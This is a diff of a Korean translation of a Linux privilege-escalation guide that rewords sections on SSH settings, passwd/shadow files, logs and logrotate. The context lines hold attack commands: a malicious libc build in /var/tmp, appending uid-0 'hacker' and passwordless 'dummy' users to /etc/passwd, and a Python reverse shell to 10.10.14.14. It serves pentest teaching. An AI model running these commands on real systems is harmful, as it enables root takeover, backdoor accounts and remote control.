๋‚ด์˜ ๊ตฌ์„ฑ ํŒŒ์ผ์— ์žˆ๋Š” ๋ชจ๋“  ํด๋”, ๊ทธ๋Š” ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ ๋‹ค์Œ ํŽ˜์ด์ง€์—์„œ **์ด ์ž˜๋ชป๋œ ๊ตฌ์„ฑ์„ ์•…์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•**์„ ํ™•์ธํ•˜์„ธ์š”: {{#ref}} @@ -1033,7 +1033,7 @@ linux-gate.so.1 => (0x005b0000) libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x00737000) ``` -๊ทธ๋Ÿฐ ๋‹ค์Œ `/var/tmp`์— ์•…์„ฑ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค: `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` +๊ทธ๋Ÿฐ ๋‹ค์Œ `/var/tmp`์— `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์•…์„ฑ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ```c #include #define SHELL "/bin/sh" @@ -1123,8 +1123,8 @@ Check **Valentine box from HTB** for an example. ### Debian OpenSSL Predictable PRNG - CVE-2008-0166 -2006๋…„ 9์›”๋ถ€ํ„ฐ 2008๋…„ 5์›” 13์ผ ์‚ฌ์ด์— Debian ๊ธฐ๋ฐ˜ ์‹œ์Šคํ…œ(Ubuntu, Kubuntu ๋“ฑ)์—์„œ ์ƒ์„ฑ๋œ ๋ชจ๋“  SSL ๋ฐ SSH ํ‚ค๋Š” ์ด ๋ฒ„๊ทธ์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ -์ด ๋ฒ„๊ทธ๋Š” ํ•ด๋‹น OS์—์„œ ์ƒˆ๋กœ์šด ssh ํ‚ค๋ฅผ ์ƒ์„ฑํ•  ๋•Œ ๋ฐœ์ƒํ•˜๋ฉฐ, **๊ฐ€๋Šฅํ•œ ๋ณ€ํ˜•์ด 32,768๊ฐœ๋งŒ ์กด์žฌํ–ˆ์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๋ชจ๋“  ๊ฐ€๋Šฅ์„ฑ์„ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์Œ์„ ์˜๋ฏธํ•˜๋ฉฐ, **ssh ๊ณต๊ฐœ ํ‚ค๊ฐ€ ์žˆ์œผ๋ฉด ํ•ด๋‹น ๊ฐœ์ธ ํ‚ค๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๊ณ„์‚ฐ๋œ ๊ฐ€๋Šฅ์„ฑ์€ ์—ฌ๊ธฐ์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +๋ชจ๋“  SSL ๋ฐ SSH ํ‚ค๋Š” 2006๋…„ 9์›”๋ถ€ํ„ฐ 2008๋…„ 5์›” 13์ผ ์‚ฌ์ด์— Debian ๊ธฐ๋ฐ˜ ์‹œ์Šคํ…œ(Ubuntu, Kubuntu ๋“ฑ)์—์„œ ์ƒ์„ฑ๋œ ๊ฒฝ์šฐ ์ด ๋ฒ„๊ทธ์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +์ด ๋ฒ„๊ทธ๋Š” ํ•ด๋‹น OS์—์„œ ์ƒˆ๋กœ์šด ssh ํ‚ค๋ฅผ ์ƒ์„ฑํ•  ๋•Œ ๋ฐœ์ƒํ•˜๋ฉฐ, **32,768๊ฐ€์ง€ ๋ณ€ํ˜•๋งŒ ๊ฐ€๋Šฅํ–ˆ์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๋ชจ๋“  ๊ฐ€๋Šฅ์„ฑ์„ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์Œ์„ ์˜๋ฏธํ•˜๋ฉฐ, **ssh ๊ณต๊ฐœ ํ‚ค๊ฐ€ ์žˆ์œผ๋ฉด ํ•ด๋‹น ๊ฐœ์ธ ํ‚ค๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๊ณ„์‚ฐ๋œ ๊ฐ€๋Šฅ์„ฑ์€ ์—ฌ๊ธฐ์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) ### SSH Interesting configuration values @@ -1147,11 +1147,11 @@ root๊ฐ€ ssh๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋กœ๊ทธ์ธํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ์—ฌ๋ถ€๋ฅผ ์ง€์ •ํ•˜๋ฉฐ, ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` -ํ•ด๋‹น ๊ตฌ์„ฑ์€ ์‚ฌ์šฉ์ž๊ฐ€ "**testusername**"์˜ **private** ํ‚ค๋กœ ๋กœ๊ทธ์ธํ•˜๋ ค๊ณ  ํ•  ๋•Œ, ssh๊ฐ€ ๊ท€ํ•˜์˜ ํ‚ค์˜ ๊ณต๊ฐœ ํ‚ค๋ฅผ `/home/testusername/.ssh/authorized_keys` ๋ฐ `/home/testusername/access`์— ์žˆ๋Š” ํ‚ค์™€ ๋น„๊ตํ•  ๊ฒƒ์ž„์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. +ํ•ด๋‹น ๊ตฌ์„ฑ์€ ์‚ฌ์šฉ์ž๊ฐ€ "**testusername**"์˜ **private** ํ‚ค๋กœ ๋กœ๊ทธ์ธํ•˜๋ ค๊ณ  ํ•  ๋•Œ, ssh๊ฐ€ ๊ท€ํ•˜์˜ ํ‚ค์˜ ๊ณต๊ฐœ ํ‚ค๋ฅผ `/home/testusername/.ssh/authorized_keys` ๋ฐ `/home/testusername/access`์— ์œ„์น˜ํ•œ ํ‚ค์™€ ๋น„๊ตํ•  ๊ฒƒ์ž„์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ### ForwardAgent/AllowAgentForwarding -SSH ์—์ด์ „ํŠธ ํฌ์›Œ๋”ฉ์„ ์‚ฌ์šฉํ•˜๋ฉด **์„œ๋ฒ„์— ํ‚ค๋ฅผ ๋‚จ๊ธฐ์ง€ ์•Š๊ณ ** **๋กœ์ปฌ SSH ํ‚ค๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (๋น„๋ฐ€๋ฒˆํ˜ธ ์—†์ด!). ๋”ฐ๋ผ์„œ ssh๋ฅผ ํ†ตํ•ด **ํ˜ธ์ŠคํŠธ๋กœ ์ ํ”„**ํ•˜๊ณ , ๊ฑฐ๊ธฐ์„œ **๋‹ค๋ฅธ** ํ˜ธ์ŠคํŠธ๋กœ **์ ํ”„**ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, **์ดˆ๊ธฐ ํ˜ธ์ŠคํŠธ**์— ์žˆ๋Š” **ํ‚ค**๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +SSH ์—์ด์ „ํŠธ ํฌ์›Œ๋”ฉ์„ ์‚ฌ์šฉํ•˜๋ฉด **์„œ๋ฒ„์— ํ‚ค๋ฅผ ๋‚จ๊ธฐ์ง€ ์•Š๊ณ ** **๋กœ์ปฌ SSH ํ‚ค๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (๋น„๋ฐ€๋ฒˆํ˜ธ ์—†์ด!). ๋”ฐ๋ผ์„œ, ssh๋ฅผ ํ†ตํ•ด **ํ˜ธ์ŠคํŠธ๋กœ ์ ํ”„**ํ•œ ๋‹ค์Œ, ๊ทธ๊ณณ์—์„œ **๋‹ค๋ฅธ** ํ˜ธ์ŠคํŠธ๋กœ **์ ํ”„**ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, **์ดˆ๊ธฐ ํ˜ธ์ŠคํŠธ**์— ์œ„์น˜ํ•œ **ํ‚ค**๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์˜ต์…˜์„ `$HOME/.ssh.config`์— ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: ``` @@ -1163,17 +1163,17 @@ ForwardAgent yes ํŒŒ์ผ `/etc/ssh_config`๋Š” ์ด **์˜ต์…˜**์„ **์žฌ์ •์˜**ํ•˜๊ณ  ์ด ๊ตฌ์„ฑ์„ ํ—ˆ์šฉํ•˜๊ฑฐ๋‚˜ ๊ฑฐ๋ถ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ ํŒŒ์ผ `/etc/sshd_config`๋Š” `AllowAgentForwarding` ํ‚ค์›Œ๋“œ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ssh-agent ํฌ์›Œ๋”ฉ์„ **ํ—ˆ์šฉ**ํ•˜๊ฑฐ๋‚˜ **๊ฑฐ๋ถ€**ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(๊ธฐ๋ณธ๊ฐ’์€ ํ—ˆ์šฉ). -ํ™˜๊ฒฝ์—์„œ Forward Agent๊ฐ€ ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋‹ค์Œ ํŽ˜์ด์ง€๋ฅผ ์ฝ์–ด๋ณด์„ธ์š”. **๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•ด ์ด๋ฅผ ์•…์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: +ํ™˜๊ฒฝ์—์„œ Forward Agent๊ฐ€ ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋‹ค์Œ ํŽ˜์ด์ง€๋ฅผ ์ฝ์–ด๋ณด์„ธ์š”. **๊ถŒํ•œ ์ƒ์Šน์„ ์•…์šฉํ•  ์ˆ˜ ์žˆ์„์ง€๋„ ๋ชจ๋ฆ…๋‹ˆ๋‹ค**: {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} -## ํฅ๋ฏธ๋กœ์šด ํŒŒ์ผ +## ํฅ๋ฏธ๋กœ์šด ํŒŒ์ผ๋“ค ### ํ”„๋กœํŒŒ์ผ ํŒŒ์ผ -ํŒŒ์ผ `/etc/profile` ๋ฐ `/etc/profile.d/` ์•„๋ž˜์˜ ํŒŒ์ผ์€ **์‚ฌ์šฉ์ž๊ฐ€ ์ƒˆ ์…ธ์„ ์‹คํ–‰ํ•  ๋•Œ ์‹คํ–‰๋˜๋Š” ์Šคํฌ๋ฆฝํŠธ**์ž…๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ, ์ด๋“ค ์ค‘ ํ•˜๋‚˜๋ฅผ **์ž‘์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. +ํŒŒ์ผ `/etc/profile` ๋ฐ `/etc/profile.d/` ์•„๋ž˜์˜ ํŒŒ์ผ๋“ค์€ **์‚ฌ์šฉ์ž๊ฐ€ ์ƒˆ๋กœ์šด ์…ธ์„ ์‹คํ–‰ํ•  ๋•Œ ์‹คํ–‰๋˜๋Š” ์Šคํฌ๋ฆฝํŠธ**์ž…๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ, ์ด๋“ค ์ค‘ ํ•˜๋‚˜๋ฅผ **์ž‘์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ```bash ls -l /etc/profile /etc/profile.d/ ``` @@ -1181,7 +1181,7 @@ ls -l /etc/profile /etc/profile.d/ ### Passwd/Shadow ํŒŒ์ผ -์šด์˜ ์ฒด์ œ์— ๋”ฐ๋ผ `/etc/passwd` ๋ฐ `/etc/shadow` ํŒŒ์ผ์ด ๋‹ค๋ฅธ ์ด๋ฆ„์„ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ ๋ฐฑ์—…์ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ **๋ชจ๋‘ ์ฐพ์•„๋ณด๊ณ ** **์ฝ์„ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธ**ํ•˜์—ฌ ํŒŒ์ผ ์•ˆ์— **ํ•ด์‹œ๊ฐ€ ์žˆ๋Š”์ง€** ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค: +์šด์˜ ์ฒด์ œ์— ๋”ฐ๋ผ `/etc/passwd` ๋ฐ `/etc/shadow` ํŒŒ์ผ์ด ๋‹ค๋ฅธ ์ด๋ฆ„์„ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ ๋ฐฑ์—…์ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ **๋ชจ๋‘ ์ฐพ๊ณ ** **์ฝ์„ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธ**ํ•˜์—ฌ ํŒŒ์ผ ์•ˆ์— **ํ•ด์‹œ๊ฐ€ ์žˆ๋Š”์ง€** ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null @@ -1200,13 +1200,13 @@ openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` -์‚ฌ์šฉ์ž `hacker`๋ฅผ ์ถ”๊ฐ€ํ•˜๊ณ  ์ƒ์„ฑ๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. +๊ทธ๋Ÿฐ ๋‹ค์Œ ์‚ฌ์šฉ์ž `hacker`๋ฅผ ์ถ”๊ฐ€ํ•˜๊ณ  ์ƒ์„ฑ๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -์ด์ œ `hacker:hacker`๋กœ `su` ๋ช…๋ น์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +์ด์ œ `su` ๋ช…๋ น์–ด๋ฅผ `hacker:hacker`๋กœ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜๋Š” ๋‹ค์Œ ์ค„์„ ์‚ฌ์šฉํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ์—†๋Š” ๋”๋ฏธ ์‚ฌ์šฉ์ž๋ฅผ ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ ๊ฒฝ๊ณ : ํ˜„์žฌ ๋จธ์‹ ์˜ ๋ณด์•ˆ์„ ์ €ํ•˜์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. @@ -1214,7 +1214,7 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` -NOTE: BSD ํ”Œ๋žซํผ์—์„œ๋Š” `/etc/passwd`๊ฐ€ `/etc/pwd.db` ๋ฐ `/etc/master.passwd`์— ์œ„์น˜ํ•˜๋ฉฐ, `/etc/shadow`๋Š” `/etc/spwd.db`๋กœ ์ด๋ฆ„์ด ๋ณ€๊ฒฝ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. +NOTE: BSD ํ”Œ๋žซํผ์—์„œ๋Š” `/etc/passwd`๊ฐ€ `/etc/pwd.db` ๋ฐ `/etc/master.passwd`์— ์œ„์น˜ํ•˜๊ณ , `/etc/shadow`๋Š” `/etc/spwd.db`๋กœ ์ด๋ฆ„์ด ๋ณ€๊ฒฝ๋ฉ๋‹ˆ๋‹ค. ๋ฏผ๊ฐํ•œ ํŒŒ์ผ์— **์“ฐ๊ธฐ**๊ฐ€ ๊ฐ€๋Šฅํ•œ์ง€ ํ™•์ธํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, **์„œ๋น„์Šค ๊ตฌ์„ฑ ํŒŒ์ผ**์— ์“ธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๊นŒ? ```bash @@ -1292,7 +1292,7 @@ Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalati ### Logs If you can read logs, you may be able to find **ํฅ๋ฏธ๋กœ์šด/๊ธฐ๋ฐ€ ์ •๋ณด๊ฐ€ ๊ทธ ์•ˆ์— ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๋กœ๊ทธ๊ฐ€ ์ด์ƒํ• ์ˆ˜๋ก ๋” ํฅ๋ฏธ๋กœ์šธ ๊ฒƒ์ž…๋‹ˆ๋‹ค (์•„๋งˆ๋„).\ -๋˜ํ•œ, ์ผ๋ถ€ "**์ž˜๋ชป๋œ**" ๊ตฌ์„ฑ๋œ (๋ฐฑ๋„์–ด๊ฐ€ ์žˆ๋Š”?) **๊ฐ์‚ฌ ๋กœ๊ทธ**๋Š” ์ด ๊ฒŒ์‹œ๋ฌผ์—์„œ ์„ค๋ช…ํ•œ ๋Œ€๋กœ ๊ฐ์‚ฌ ๋กœ๊ทธ์— **๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๊ธฐ๋กํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). +๋˜ํ•œ, "**์ž˜๋ชป๋œ**" ๊ตฌ์„ฑ(๋ฐฑ๋„์–ด?)๋œ **๊ฐ์‚ฌ ๋กœ๊ทธ**๋Š” ์ด ๊ฒŒ์‹œ๋ฌผ์—์„œ ์„ค๋ช…ํ•œ ๋Œ€๋กœ ๊ฐ์‚ฌ ๋กœ๊ทธ์— **๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๊ธฐ๋กํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null @@ -1325,18 +1325,18 @@ grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` -### Logrotate ์•…์šฉ +### Logrotate exploitation -`logrotate`์˜ ์ทจ์•ฝ์ ์€ ๋กœ๊ทธ ํŒŒ์ผ์ด๋‚˜ ๊ทธ ์ƒ์œ„ ๋””๋ ‰ํ† ๋ฆฌ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ ์ƒ์Šน์„ ์–ป์„ ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” `logrotate`๊ฐ€ ์ข…์ข… **root**๋กœ ์‹คํ–‰๋˜๊ธฐ ๋•Œ๋ฌธ์—, _**/etc/bash_completion.d/**_์™€ ๊ฐ™์€ ๋””๋ ‰ํ† ๋ฆฌ์—์„œ ์ž„์˜์˜ ํŒŒ์ผ์„ ์‹คํ–‰ํ•˜๋„๋ก ์กฐ์ž‘๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋กœ๊ทธ ํšŒ์ „์ด ์ ์šฉ๋˜๋Š” ๋ชจ๋“  ๋””๋ ‰ํ† ๋ฆฌ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ _/var/log_์—์„œ๋„ ๊ถŒํ•œ์„ ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. +`logrotate`์˜ ์ทจ์•ฝ์ ์€ ๋กœ๊ทธ ํŒŒ์ผ์ด๋‚˜ ๊ทธ ์ƒ์œ„ ๋””๋ ‰ํ† ๋ฆฌ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์ž ์žฌ์ ์œผ๋กœ ๊ถŒํ•œ ์ƒ์Šน์„ ์–ป์„ ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” `logrotate`๊ฐ€ ์ข…์ข… **root**๋กœ ์‹คํ–‰๋˜๊ธฐ ๋•Œ๋ฌธ์—, _**/etc/bash_completion.d/**_์™€ ๊ฐ™์€ ๋””๋ ‰ํ† ๋ฆฌ์—์„œ ์ž„์˜์˜ ํŒŒ์ผ์„ ์‹คํ–‰ํ•˜๋„๋ก ์กฐ์ž‘๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋กœ๊ทธ ํšŒ์ „์ด ์ ์šฉ๋˜๋Š” ๋ชจ๋“  ๋””๋ ‰ํ† ๋ฆฌ์—์„œ _/var/log_๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ๊ถŒํ•œ์„ ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. -> [!NOTE] +> [!TIP] > ์ด ์ทจ์•ฝ์ ์€ `logrotate` ๋ฒ„์ „ `3.18.0` ๋ฐ ์ด์ „ ๋ฒ„์ „์— ์˜ํ–ฅ์„ ๋ฏธ์นฉ๋‹ˆ๋‹ค. ์ทจ์•ฝ์ ์— ๋Œ€ํ•œ ๋” ์ž์„ธํ•œ ์ •๋ณด๋Š” ์ด ํŽ˜์ด์ง€์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). ์ด ์ทจ์•ฝ์ ์€ [**logrotten**](https://github.com/whotwagner/logrotten)์œผ๋กœ ์•…์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -์ด ์ทจ์•ฝ์ ์€ [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx ๋กœ๊ทธ)**์™€ ๋งค์šฐ ์œ ์‚ฌํ•˜๋ฏ€๋กœ, ๋กœ๊ทธ๋ฅผ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ ๋กœ๊ทธ๋ฅผ ๊ด€๋ฆฌํ•˜๋Š” ์‚ฌ๋žŒ์ด ๋ˆ„๊ตฌ์ธ์ง€ ํ™•์ธํ•˜๊ณ , ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋กœ ๋กœ๊ทธ๋ฅผ ๋Œ€์ฒดํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์ด ๊ฐ€๋Šฅํ•œ์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค. +์ด ์ทจ์•ฝ์ ์€ [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx ๋กœ๊ทธ)**์™€ ๋งค์šฐ ์œ ์‚ฌํ•˜๋ฏ€๋กœ, ๋กœ๊ทธ๋ฅผ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ ๋กœ๊ทธ๋ฅผ ๊ด€๋ฆฌํ•˜๋Š” ์‚ฌ๋žŒ์ด ๋ˆ„๊ตฌ์ธ์ง€ ํ™•์ธํ•˜๊ณ , ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋กœ ๋กœ๊ทธ๋ฅผ ๋Œ€์ฒดํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) @@ -1356,11 +1356,11 @@ DEVICE=eth0 ``` ### **init, init.d, systemd, ๋ฐ rc.d** -๋””๋ ‰ํ† ๋ฆฌ `/etc/init.d`๋Š” **System V init (SysVinit)**์„ ์œ„ํ•œ **์Šคํฌ๋ฆฝํŠธ**์˜ ์ง‘ํ•ฉ์ž…๋‹ˆ๋‹ค. ์ด๋Š” **๊ณ ์ „์ ์ธ ๋ฆฌ๋ˆ…์Šค ์„œ๋น„์Šค ๊ด€๋ฆฌ ์‹œ์Šคํ…œ**์œผ๋กœ, ์„œ๋น„์Šค์˜ `start`, `stop`, `restart`, ๋•Œ๋•Œ๋กœ `reload`๋ฅผ ์œ„ํ•œ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์Šคํฌ๋ฆฝํŠธ๋Š” ์ง์ ‘ ์‹คํ–‰ํ•˜๊ฑฐ๋‚˜ `/etc/rc?.d/`์— ์žˆ๋Š” ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋ฅผ ํ†ตํ•ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Redhat ์‹œ์Šคํ…œ์˜ ๋Œ€์ฒด ๊ฒฝ๋กœ๋Š” `/etc/rc.d/init.d`์ž…๋‹ˆ๋‹ค. +๋””๋ ‰ํ† ๋ฆฌ `/etc/init.d`๋Š” **System V init (SysVinit)**์„ ์œ„ํ•œ **์Šคํฌ๋ฆฝํŠธ**์˜ ์ง‘ํ•ฉ์ž…๋‹ˆ๋‹ค. ์ด๋Š” **๊ณ ์ „์ ์ธ ๋ฆฌ๋ˆ…์Šค ์„œ๋น„์Šค ๊ด€๋ฆฌ ์‹œ์Šคํ…œ**์œผ๋กœ, ์„œ๋น„์Šค์˜ `start`, `stop`, `restart`, ๋•Œ๋•Œ๋กœ `reload`๋ฅผ ์œ„ํ•œ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค. ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ์ง์ ‘ ์‹คํ–‰ํ•˜๊ฑฐ๋‚˜ `/etc/rc?.d/`์— ์žˆ๋Š” ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋ฅผ ํ†ตํ•ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Redhat ์‹œ์Šคํ…œ์˜ ๋Œ€์ฒด ๊ฒฝ๋กœ๋Š” `/etc/rc.d/init.d`์ž…๋‹ˆ๋‹ค. ๋ฐ˜๋ฉด์—, `/etc/init`๋Š” **Upstart**์™€ ๊ด€๋ จ์ด ์žˆ์œผ๋ฉฐ, ์ด๋Š” Ubuntu์—์„œ ๋„์ž…ํ•œ ์ตœ์‹  **์„œ๋น„์Šค ๊ด€๋ฆฌ**๋กœ, ์„œ๋น„์Šค ๊ด€๋ฆฌ ์ž‘์—…์„ ์œ„ํ•œ ๊ตฌ์„ฑ ํŒŒ์ผ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. Upstart๋กœ์˜ ์ „ํ™˜์—๋„ ๋ถˆ๊ตฌํ•˜๊ณ , SysVinit ์Šคํฌ๋ฆฝํŠธ๋Š” Upstart ๊ตฌ์„ฑ๊ณผ ํ•จ๊ป˜ ํ˜ธํ™˜์„ฑ ๊ณ„์ธต ๋•๋ถ„์— ์—ฌ์ „ํžˆ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. -**systemd**๋Š” ํ˜„๋Œ€์ 